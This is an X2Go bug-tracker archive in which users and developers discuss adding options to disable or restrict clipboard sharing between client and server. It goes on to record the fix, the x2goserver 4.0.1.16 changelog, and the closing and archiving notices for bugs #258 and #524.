> direction, or at least to disable it completely.
>
> I have searched for it for quite a while, but the best I have
> managed to find is a bug report
> http://bugs.x2go.org/cgi-bin/bugreport.cgi?bug=258
> and a mailing list question without a single reply.
>
> Is there some way to configure it?
> If not, is it going to be hard to write a patch that would turn
> this off at compilation time?
> I've also been thinking of using some external programs to achieve
> the effect, e.g. putting X2Go inside Xephyr, or the other way round...
>
> Any hints most welcome
>
> Many thanks,
> Kris

There should be two approaches...
1) disable clipboard server-side for all users
2) disable clipboard in X2Go Client / PyHoca-GUI on the client-side

The first is easy. Please look at /usr/bin/x2gostartagent of x2goserver package and make clipboard configurable via /etc/x2go/x2goserver.conf. Send a patch to our BTS [1].

The second approach is for us devs, I guess...

The workaround provided by Mike#2 is a fine approach, but not a real solution to this problem.

Mike#1

[1] http://wiki.x2go.org/doku.php/wiki:bugs

--
DAS-NETZWERKTEAM mike gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
--=_07l0yBSoJq8RBmtev9FzKA7 Content-Type: application/pgp-signature Content-Description: Digitale PGP-Signatur Content-Disposition: inline
--=_07l0yBSoJq8RBmtev9FzKA7--
From kril@sourcecap.ch Tue Jan 28 17:16:33 2014 Received: (at 258) by bugs.x2go.org; 28 Jan 2014 16:16:34 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0
tests=BAYES_00 autolearn=ham version=3.3.2 X-Greylist: delayed 324 seconds by postgrey-1.34 at ymir; Tue, 28 Jan 2014 17:16:33 CET Received: from mail.sourcecap.ch (mail.sourcecap.ch [91.201.56.210]) by ymir (Postfix) with ESMTP id AE0C65DB13 for <258@bugs.x2go.org>; Tue, 28 Jan 2014 17:16:33 +0100 (CET) Received: from [172.168.246.3] (kril.rem.sc.int [172.168.246.3]) by mail.sourcecap.ch (Postfix) with ESMTPSA id 61D13320AB; Tue, 28 Jan 2014 17:11:09 +0100 (CET) Message-ID: <52E7D6B8.6070208@sourcecap.ch> Date: Tue, 28 Jan 2014 17:11:36 +0100 
From: Kris Ilowiecki User-Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20130215 Thunderbird/17.0.3 MIME-Version: 1.0 To: x2go-user@lists.berlios.de CC: 258@bugs.x2go.org Subject: Re: [X2Go-User] Limiting clipboard sharing References: <52E69B93.8010904@sourcecap.ch> <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> In-Reply-To: <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: clamav-milter 0.96 at pmx4 X-Virus-Status: Clean

Hi Mike#1,

On 01/28/2014 04:49 PM, Mike Gabriel wrote:
> There should be two approaches...
>
> 1) disable clipboard server-side for all users
> 2) disable clipboard in X2Go Client / PyHoca-GUI on the client-side
>
> The first is easy. Please look at /usr/bin/x2gostartagent of x2goserver
> package and make clipboard configurable via /etc/x2go/x2goserver.conf.
> Send a patch to our BTS [1].
>

Thank you very much! The first approach is indeed what is needed in my case. I will have a look there.

I have been looking through the sources, and my most recent idea was experimenting with editing /usr/bin/nxagent to run nxagent.bin with something like "-clipboard no"

I will try the exact approach you are suggesting, though my bash+awk aren't that good

Many thanks, Kris

> The second approach is for us devs, I guess...
>
> The workaround provided by Mike#2 is a fine approach, but not a real
> solution to this problem.
>
> Mike#1
>
> [1] http://wiki.x2go.org/doku.php/wiki:bugs

From krzysztof.ilowiecki@sourcecap.ch Tue Jan 28 19:11:33 2014 Received: (at 258) by bugs.x2go.org; 28 Jan 2014 18:11:34 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=ham version=3.3.2 X-Greylist: delayed 371 seconds by postgrey-1.34 at ymir; Tue, 28 Jan 2014 19:11:33 CET Received: from mail.sourcecap.ch (mail.sourcecap.ch [91.201.56.210]) by ymir (Postfix) with ESMTP id A44035DB13 for <258@bugs.x2go.org>; Tue, 28 Jan 2014 19:11:33 +0100 (CET) Received: from [172.168.246.3] (kril.rem.sc.int [172.168.246.3]) by mail.sourcecap.ch (Postfix) with ESMTPSA id A033E320AB; Tue, 28 Jan 2014 19:05:21 +0100 (CET) Message-ID: <52E7F17D.2010001@sourcecap.ch> Date: Tue, 28 Jan 2014 19:05:49 +0100
From: Krzysztof Ilowiecki User-Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20130215 Thunderbird/17.0.3 MIME-Version: 1.0 To: x2go-user@lists.berlios.de CC: 258@bugs.x2go.org Subject: Re: [X2Go-User] Limiting clipboard sharing References: <52E69B93.8010904@sourcecap.ch> <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> <52E7D6B8.6070208@sourcecap.ch> In-Reply-To: <52E7D6B8.6070208@sourcecap.ch> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: clamav-milter 0.96 at pmx4 X-Virus-Status: Clean

On 01/28/2014 05:11 PM, Kris Ilowiecki wrote:
> I have been looking through the sources, and my most recent idea was
> experimenting with editing /usr/bin/nxagent to run nxagent.bin
> with something like "-clipboard no"
>
> I will try the exact approach you are suggesting, though
> my bash+awk aren't that good

just a short update, the crude approach I had tried (hacking /usr/bin/nxagent) seems to be working. I just had made the mistake of typing "-clipboard no" instead of "-clipboard none" or "-clipboard client".

I will have a closer look at editing the x2gostartagent to read x2goserver.conf, but I don't know if I'll succeed at this point.
Many thanks, Kris From mike.gabriel@das-netzwerkteam.de Sun Jun 1 05:28:44 2014 Received: (at control) by bugs.x2go.org; 1 Jun 2014 03:28:44 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-0.1 required=5.0 tests=BAYES_00,MISSING_SUBJECT, URIBL_BLOCKED autolearn=no version=3.3.2 Received: from freya.das-netzwerkteam.de (freya.das-netzwerkteam.de [88.198.48.199]) by ymir.das-netzwerkteam.de (Postfix) with ESMTPS id 7EFDD5DA79 for ; Sun, 1 Jun 2014 05:28:44 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (grimnir.das-netzwerkteam.de [78.46.204.98]) by freya.das-netzwerkteam.de (Postfix) with ESMTPS id 4EA342DED for ; Sun, 1 Jun 2014 05:28:44 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTP id 9C9703C81B for ; Sun, 1 Jun 2014 05:28:43 +0200 (CEST) X-Virus-Scanned: Debian amavisd-new at grimnir.das-netzwerkteam.de Received: from grimnir.das-netzwerkteam.de ([127.0.0.1]) by localhost (grimnir.das-netzwerkteam.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id VNY0NkC-gbM4 for ; Sun, 1 Jun 2014 05:28:43 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTPS id 086A03C0CF for ; Sun, 1 Jun 2014 05:28:43 +0200 (CEST) Received: from p5B2855DE.dip0.t-ipconnect.de (p5B2855DE.dip0.t-ipconnect.de [91.40.85.222]) by mail.das-netzwerkteam.de (Horde Framework) with HTTP; Sun, 01 Jun 2014 03:28:42 +0000 Date: Sun, 01 Jun 2014 03:28:42 +0000 Message-ID: <20140601032842.Horde.hGe57FrJWSM0osjmmM-bZg2@mail.das-netzwerkteam.de> 
From: Mike Gabriel To: control@bugs.x2go.org User-Agent: Internet Messaging Program (IMP) H5 (6.1.7) Accept-Language: en,de Organization: DAS-NETZWERKTEAM X-Originating-IP: 91.40.85.222 X-Remote-Browser: Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 Iceweasel/29.0.1 Content-Type: multipart/signed; boundary="=_zvdcdcG2-3cUU3TbvjxXoA1"; protocol="application/pgp-signature"; micalg=pgp-sha1 MIME-Version: 1.0

This message is in MIME format and has been PGP signed.

--=_zvdcdcG2-3cUU3TbvjxXoA1 Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

clone #258 -1 -2 -3 -4
reassign -1 x2goserver
reassign -2 pyhoca-gui
reassign -3 python-x2go
reassign -4 wiki.x2go.org
retitle -1 Add option to x2goserver.conf for disabling server-side clipboard globally
retitle -2 Add option to pyhoca-gui's profile manager to disable client-side clipboard (per session profile)
retitle -3 Add support to X2GoSession class for disabling client-side clipboard
retitle -4 Better document NX/X11 security issues of X2Go (e.g. clipboard sniffing)
thanks

--
DAS-NETZWERKTEAM mike gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
--=_zvdcdcG2-3cUU3TbvjxXoA1 Content-Type: application/pgp-signature Content-Description: Digitale PGP-Signatur Content-Disposition: inline
--=_zvdcdcG2-3cUU3TbvjxXoA1--
From mike.gabriel@das-netzwerkteam.de Fri Jun 27 20:13:19 2014 Received: (at 258) by bugs.x2go.org; 27 Jun 2014 18:13:35 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=unavailable version=3.3.2 Received: from freya.das-netzwerkteam.de (freya.das-netzwerkteam.de [88.198.48.199]) by ymir.das-netzwerkteam.de (Postfix) with ESMTPS id E05335DB09; Fri, 27 Jun 2014 20:13:18 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (grimnir.das-netzwerkteam.de [78.46.204.98]) by freya.das-netzwerkteam.de (Postfix) with ESMTPS id 6C22A122DB; Fri, 27 Jun 2014 20:13:18 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTP id EC0F33BA0E; Fri, 27 Jun 2014 20:13:17 +0200 (CEST) X-Virus-Scanned: Debian amavisd-new at grimnir.das-netzwerkteam.de Received: from grimnir.das-netzwerkteam.de ([127.0.0.1]) by localhost (grimnir.das-netzwerkteam.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id r8TIn30qdEAG; Fri, 27 Jun 2014 20:13:17 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTPS id ACFE53B8A9; Fri, 27 Jun 2014 20:13:17 +0200 (CEST) Received: from pD9E9F072.dip0.t-ipconnect.de (pD9E9F072.dip0.t-ipconnect.de [217.233.240.114]) by mail.das-netzwerkteam.de (Horde Framework) with HTTP; Fri, 27 Jun 2014 18:13:17 +0000 Date: Fri, 27 Jun 2014 18:13:17 +0000
Message-ID: <20140627181317.Horde.7sxaRMi5BeO4m3MoL5JiUQ1@mail.das-netzwerkteam.de> 
From: Mike Gabriel To: 258@bugs.x2go.org Cc: control@bugs.x2go.org, 507@bugs.x2go.org, 508@bugs.x2go.org Subject: Make clipboard security choosable from client User-Agent: Internet Messaging Program (IMP) H5 (6.1.7) Accept-Language: en,de Organization: DAS-NETZWERKTEAM X-Originating-IP: 217.233.240.114 X-Remote-Browser: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Iceweasel/30.0 Content-Type: multipart/signed; boundary="=_HD6JexkNSa-PhYyzptN_zg1"; protocol="application/pgp-signature"; micalg=pgp-sha1 MIME-Version: 1.0

This message is in MIME format and has been PGP signed.

--=_HD6JexkNSa-PhYyzptN_zg1 Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

clone #258 -1
reassign -1 x2goserver
retitle -1 Provide support in X2Go Server for making clipboard security choosable by the client
block #258 by -1
block #507 by -1
block #508 by -1
thanks

Hi all,

I am currently working on making the clipboard modes configurable on the X2Go Client side.
Clipboard modes in NX are: o c+p in both directions (server->client, client->server) o c+p server->client o c+p client->server o no copy+paste at all Greets, Mike --=20 DAS-NETZWERKTEAM mike=20gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.x= fb --=_HD6JexkNSa-PhYyzptN_zg1 Content-Type: application/pgp-signature Content-Description: Digitale PGP-Signatur Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAABAgAGBQJTrbQ9AAoJEJr0azAldxsxFnkP/0qbDJ3eQGFsrX9a10qvKMdO adavpDHiF0LrDadyUdGlY5ly23twUL86lgs8jOwGnLWv1aa76K6DX9FYq4shtj6B ot2fpQPOSdCaO/j9CahPsjEzpUVcwuEFwOUylFUL3yy8v/VNvgPfz311fnbKal3m yBf0D0IBN+XPbEg1gb5BU03JZoM9qsazKfbAfs1VXL8k/0/hamgr5I4Uetm/d0y+ DpntZlEtw3pMxg4BJXArt2FA/ym96EPCCnsLjSmQbYLOKBns7umyz6eL0N1kOFRK CKD7Cb3rb5RSZwkvhFYYGirXLpBSD7zUATZ4UJV767DmJMLP5tZZP/xhoUkgRvAi Es5kn3GZeaFsYjmnqjDwQJ+Fk8L2GvPbpf88+5Avec4LTp5LB5AQH3ddZ/ChQjX0 hs4T5LAyQEY26YBoskEx4ckS1+A4po86/5844DGNGD0wKLKAYn8eDRQ5bYJsuhBU EX2gq3vHt7cS5EVVqGCOSbrHqQ2JdHn41BTTK1Scf2YT1gbDwIOULjxeJH35+iNf N/bGUdpAoj0ys5hYfiRXtCcGkXwMVDPA6wW5bvSI3DinRrtXCUsoPc5zUqCuevG8 MOTvDIdDRg6zHkVpSfnky+onq9rtqP7m3sy13u9rLuINL/nXXYhMFJUoupQ6LNcM xPlUgXkI4qy1Sql1qXGa =xSsj -----END PGP SIGNATURE----- --=_HD6JexkNSa-PhYyzptN_zg1-- From x2go@ymir.das-netzwerkteam.de Sun Jun 29 00:20:11 2014 Received: (at 524) by bugs.x2go.org; 28 Jun 2014 22:20:12 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,NO_RELAYS autolearn=ham version=3.3.2 Received: by ymir.das-netzwerkteam.de (Postfix, from userid 1005) id 687805DB53; Sun, 29 Jun 2014 00:20:11 +0200 (CEST) 
From: Mike Gabriel
To: 524-submitter@bugs.x2go.org
Cc: control@bugs.x2go.org, 524@bugs.x2go.org
Subject: X2Go issue (in src:x2goserver) has been marked as pending for release
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-Mailer: http://snipr.com/post-receive-tag-pending
Message-Id: <20140628222011.687805DB53@ymir.das-netzwerkteam.de>
Date: Sun, 29 Jun 2014 00:20:11 +0200 (CEST)

tag #524 pending
fixed #524 4.0.1.16
thanks

Hello,

X2Go issue #524 (src:x2goserver) reported by you has been fixed in X2Go Git. You can see the changelog below, and you can check the diff of the fix at:

    http://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=6232fbb

The issue will most likely be fixed in src:x2goserver (4.0.1.16).

light+love
X2Go Git Admin (on behalf of the sender of this mail)

---
commit 6232fbb825df7e1538ab1f1ab42fec5b02c50a55
Author: Mike Gabriel
Date: Sun Jun 29 00:18:07 2014 +0200

    Provide support for client-side choice of clipboard security. (Fixes: #524).

diff --git a/debian/changelog b/debian/changelog index ec15d3d..4384a31 100644 --- a/debian/changelog +++ b/debian/changelog
@@ -46,6 +46,8 @@ x2goserver (4.0.1.16-0x2go1) UNRELEASED; urgency=low - Don't die if no session state file is found, as it will break X2Go completely after upgrading from versions << 4.0.1.16 if sessions are still running/suspended during package upgrade. + - Provide support for client-side choice of clipboard security. (Fixes: + #524). * debian/control, x2goserver.spec: + Update versioned D: x2goagent (>= 3.5.0.25). This assures that X2Go works with poly-instantiated /tmp directories. From x2go@ymir.das-netzwerkteam.de Fri Sep 26 00:42:16 2014 Received: (at 524) by bugs.x2go.org; 25 Sep 2014 22:42:52 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,NO_RELAYS autolearn=ham version=3.3.2 Received: by ymir.das-netzwerkteam.de (Postfix, from userid 1005) id B51065E0AE; Fri, 26 Sep 2014 00:42:15 +0200 (CEST) 
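Review bot: the entry added at "+ - Provide support for client-side choice of clipboard security." does not say which clipboard modes a client may select or what the server applies when the client sends no choice; for a setting that decides whether clipboard contents cross the session boundary, name the accepted modes and the default in the changelog text. Only debian/changelog is visible in this diff, so the server-side handling of the client's value cannot be checked from it.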
From: Mike Gabriel
To: 524-submitter@bugs.x2go.org
Cc: control@bugs.x2go.org, 524@bugs.x2go.org
Subject: X2Go issue (in src:x2goserver) has been marked as closed
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Message-Id: <20140925224215.B51065E0AE@ymir.das-netzwerkteam.de>
Date: Fri, 26 Sep 2014 00:42:15 +0200 (CEST)

close #524
thanks

Hello,

we are very hopeful that X2Go issue #524 reported by you has been resolved in the new release (4.0.1.16) of the X2Go source project »src:x2goserver«.

You can view the complete changelog entry of src:x2goserver (4.0.1.16) below, and you can use the following link to view all the code changes between this and the last release of src:x2goserver.

    http://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=c43b862f2ae0e8980fb7ab5e519d692b07da5a45;hp=98c4f84d83d701823b7887f79d0d9f5ce8233bd4

If you feel that the issue has not been resolved satisfyingly, feel free to reopen this bug report or submit a follow-up report with further observations described based on the new released version of src:x2goserver.

Thanks a lot for contributing to X2Go!!!

light+love
X2Go Git Admin (on behalf of the sender of this mail)

---
X2Go Component: src:x2goserver
Version: 4.0.1.16-0x2go1
Status: RELEASE
Date: Fri, 26 Sep 2014 00:36:32 +0200
Fixes: 122 302 397 406 407 458 468 495 506 511 520 523 524 543 547 558 569 572 573 574 599 605 606 617 619
Changes:
 x2goserver (4.0.1.16-0x2go1) RELEASED; urgency=low
 .
 [ Mike DePaulo ]
 * New upstream release (4.0.1.16):
   - Make X2Go Server aware of the Openbox desktop environment (Command: OPENBOX) (Fixes: #605)
   - Make X2Go Server aware of the IceWM desktop environment (Command: ICEWM) (Fixes: #606)
   - Support GNOME Flashback session (GNOME 3.8+) on distro releases such as Ubuntu 13.10+ and debian Jessie (NOTE: For most users, GNOME Flashback currently will not work. This requires that gnome-flashback.session actually be installed. Not every Linux distro has it available. It also requires that the gnome-session binary not require hardware 3D acceleration for said session. Currently, upstream GNOME and GNOME 3.8+ in all Linux distros do require this, only 3rd party builds do not. See X2Go bug #599 for example.) (Thanks Eugene San (eugenesan@gmail.com))
   - Fix launching GNOME 3 Fallback session (GNOME 3.4 & 3.6) on distros other than Ubuntu and Debian (Fixes: #599)
   - Fix support for Cinnamon 1.4 (Linux Mint 13) (Fixes: #569)
   - Fix the logic for launching Cinnamon 2.0 and 2.2 (Linux Mint 17). (Fixes: #572) NOTE: Fixing this bug in x2goserver is not sufficient to make Cinnamon 2.0 & 2.2 to work properly with X2Go. Bug #150 in nx-libs is still a problem. Fixing this bug enables Cinnamon 2.0 and 2.2 to launch to their "fallback mode", which has many bugs and missing features when compared to "software rendering" mode (cinnamon2d), but is still better than nothing.
 * debian/rules:
   + Improve dh_auto_clean override.
 .
 [ Mike Gabriel ]
 * New upstream version (4.0.1.16):
   - Let x2goversion exit with an error if the X2Go component cannot be found.
   - Detect terminated sessions from NX log file. Also interpret a session as terminated if terminating just has started.
   - Detect started/starting/resumed/resuming sessions by explicitly scanning the NX session log file for those keywords.
   - Interpret NX sessions marked as "aborting session" as (not yet) terminated sessions.
   - Provide config option for server-side/global clipboard behaviour in x2goagent.options. (Fixes: #506).
   - Be aware of poly-instantiated /tmp directories bind-mounted under /tmp-inst. (Fixes: #406).
   - On suspend: Call x2goumount-session before sending SIGHUP to x2goagent.
   - Refuse client communcation if server-side hostname is not set up correctly (Fixes: #468).
   - Fix string comparison in x2goumount-session.
   - Fix problems with unmounting shared folders on session suspension/termination. Remove extra parentheses from the fusermount execution call. (Fixes: #407).
   - Use type -p instead of which in x2goumount-session. Suppress output to stdout properly.
   - Use if--then--else--fi during x2goagent resuming in x2goresume-session script.
   - More reliably sync the NX session state with the status information in the X2Go session DB.
   - x2golistdesktops: Also detect sharable desktop sessions behind abstract kernel namespace sockets.
   - Add logcheck rules for X2Go Server. Thanks to Frank Werner for sending them in.
   - Correctly use diversions from stderr to stdout in shell commands. (Fixes: #520).
   - Don't die if no session state file is found, as it will break X2Go completely after upgrading from versions << 4.0.1.16 if sessions are still running/suspended during package upgrade.
   - Provide support for client-side choice of clipboard security. (Fixes: #524).
   - Use more quotes in x2goruncommand.
   - Detect the exit of rootless applications that forked to background on application execution. (Fixes: #122).
   - Make x2goruncommand more robust.
   - Don't fail Xsession startup if any of the profile scripts returns with an error.
   - Silently timeout in x2golistdesktops if calls to x2golistsessions and/or xwininfo don't produce output within one second. (Fixes: #543).
   - Allow email addresses as login usernames. (Fixes: #573).
   - Abort session startup if env var $USER or $SSH_CLIENT are not set. (Fixes: #558).
   - Allow length of username up to 48 characters (was: 32 characters). (Fixes: #574).
   - Abort session if env var $HOME is not set or if $HOME contains non-ASCII characters. (Fixes: #397).
   - Export XAUTHORITY env var in x2goruncommand to enable privilege upgrade for applications started via pkexec. (Fixes: #458).
   - x2gocleansessions: Don't print to stderr if the session state file cannot be found. This can happen during session startups. Report to system log instead.
   - Don't use Perl package File::ReadBackwards anymore.
   - Fix x2gormforward for 4.0.1.x release series (the X2Go::Log Perl module only exists in X2Go Server >= 4.1.0.0, the 4.0.1.x release series has to use x2gologlevel.pm in `x2gopath lib`. (Fixes: #617).
   - Pick x2gogetagentstate from 4.1.0.0 release series and adapt to usage with X2Go Server 4.0.1.x. (Fixes: #619).
 * debian/control, x2goserver.spec:
   + Update versioned D: x2goagent (>= 3.5.0.25). This assures that X2Go works with poly-instantiated /tmp directories.
   + Make sure x2gogetagentstate gets packaged in bin:package x2goserver.
   + Bump Standards: to 3.9.5. No changes needed.
   + Mark x2goserver-pyhoca bin:package as deprecated.
   + Drop D (x2goserver): libfile-readbackwards-perl.
 * x2goserver.spec:
   + Install {libdir}/x2go/x2gormforward into bin:package x2goserver.
   + Drop R (x2goserver): perl(File::ReadBackwards).
 .
 [ Oleksandr Shneyder ]
 * New upstream version (4.0.1.16):
   - x2gostartagent, x2golistsession, x2gosuspend-session and x2goresume-session getting agent state from ~/.x2go/C-$SID/state. This should help to avoid session damage. Remove nxcleanup. (Fixes: #302, #511).
   - Move session file to /tmp/.x2go-$USER. (Fixes: #523).
   - Fix x2gostartagent failures if kbd is not "auto". Remove comma at end of options file.
   - Set default value for clipboard to "both" in x2gostartagent and x2goresume-session.
   - Clean user SSHD process if connection between server and client lost. This should fix error "Global request tcpip-forward failed". (Fixes: #495, #547).
 .
 [ Orion Paplowski ]
 * x2goserver.spec:
   + Sync Fedora .spec file with our upstream-provided x2goserver.spec.

From unknown Thu Mar 28 15:39:36 2024
MIME-Version: 1.0
X-Mailer: MIME-tools 5.502 (Entity 5.502)
X-Loop: owner@bugs.x2go.org
From: owner@bugs.x2go.org (X2Go Bug Tracking System)
Subject: Bug#524 closed by Mike Gabriel (X2Go issue (in src:x2goserver) has been marked as closed)
Message-ID:
References: <20140925224215.B51065E0AE@ymir.das-netzwerkteam.de>
X-X2go-PR-Keywords: security pending
X-X2go-PR-Message: they-closed 524
X-X2go-PR-Package: x2goserver
X-X2go-PR-Source: x2goserver
Date: Thu, 25 Sep 2014 22:45:43 +0000
Content-Type: multipart/mixed; boundary="----------=_1411685143-21712-0"

This is a multi-part message in MIME format...

------------=_1411685143-21712-0
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=utf-8

This is an automatic notification regarding your Bug report which was filed against the x2goserver package:

#524: Provide support in X2Go Server for making clipboard

It has been closed by Mike Gabriel.

Their explanation is attached below along with your original report. If this explanation is unsatisfactory and you have not received a better one in a separate message then please contact Mike Gabriel by replying to this email.

-- 
X2Go Bug Tracking System
Contact owner@bugs.x2go.org with problems

------------=_1411685143-21712-0
Content-Type: message/rfc822
Content-Disposition: inline
Content-Transfer-Encoding: 7bit

Received: (at control) by bugs.x2go.org; 25 Sep 2014 22:43:43 +0000
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de
X-Spam-Level:
X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,NO_RELAYS autolearn=unavailable version=3.3.2
Received: by ymir.das-netzwerkteam.de (Postfix, from userid 1005) id B51065E0AE; Fri, 26 Sep 2014 00:42:15 +0200 (CEST)
------------=_1411685143-21712-0--

From unknown Thu Mar 28 15:39:36 2024
Received: (at fakecontrol) by fakecontrolmessage;
To: internal_control@bugs.x2go.org
From: Debbugs Internal Request
Subject: Internal Control
Message-Id: Bug archived.
Date: Fr, 24 Okt 2014 05:24:02 +0000
User-Agent: Fakemail v42.6.9

# A New Hope
# A long time ago, in a galaxy far, far away
# something happened.
#
# Magically this resulted in the following
# action being taken, but this fake control
# message doesn't tell you why it happened
#
# The action:
# Bug archived.
thanks
# This fakemail brought to you by your local debbugs
# administrator